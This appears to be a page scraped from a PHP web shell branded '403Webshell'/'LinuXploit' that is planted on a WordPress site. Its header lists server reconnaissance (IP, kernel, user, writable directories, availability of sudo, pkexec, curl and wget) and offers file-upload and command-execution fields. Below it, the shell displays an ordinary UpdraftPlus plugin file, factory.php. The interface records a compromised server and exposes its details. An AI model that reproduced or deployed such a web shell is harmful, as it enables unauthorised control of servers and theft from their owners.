403Webshell
Server IP : 172.67.201.108  /  Your IP : 216.73.216.25
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/domains/celeberateshowcase.com/wp-content/plugins/updraftplus/central/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/domains/celeberateshowcase.com/wp-content/plugins/updraftplus/central/factory.php
<?php

/**
 * Returns an instance of the host plugin class where the UpdraftCentral "central" folder is being
 * integrated.
 */
class UpdraftCentral_Factory {

	/**
	 * Creates a host plugin instance for the given plugin name if found. Otherwise, it will return null
	 *
	 * @param string $plugin The name of the host plugin that the "central" folder is currently embedded
	 * @return object|null
	 */
	public static function create_host($plugin) {
		// N.B. You can add additional host plugins here. Just make sure that you will create
		// a host class for that particular plugin (see updraftplus/central/updraftplus.php as an example).
		$mapped_classes = array(
			'updraftplus' => 'UpdraftPlus_Host',
			// 'wp-optimize' => 'WPOptimize_Host'
		);

		if (!isset($mapped_classes[$plugin])) return null;

		$host_class = $mapped_classes[$plugin];
		if (!class_exists($host_class)) {
			$central_folder = defined('UPDRAFTCENTRAL_CLIENT_DIR') ? UPDRAFTCENTRAL_CLIENT_DIR : dirname(__FILE__);
			if (file_exists($central_folder.'/'.$plugin.'.php')) {
				include_once($central_folder.'/'.$plugin.'.php');
			} else {
				return null;
			}
		}

		return $host_class::instance();// phpcs:ignore PHPCompatibility.Syntax.NewDynamicAccessToStatic.Found
	}
}

global $updraftcentral_host_plugin;
$updraftcentral_host_plugin = UpdraftCentral_Factory::create_host(defined('UPDRAFTCENTRAL_HOST_PLUGIN') ? UPDRAFTCENTRAL_HOST_PLUGIN : 'updraftplus');

Youez - 2016 - github.com/yon3zu
LinuXploit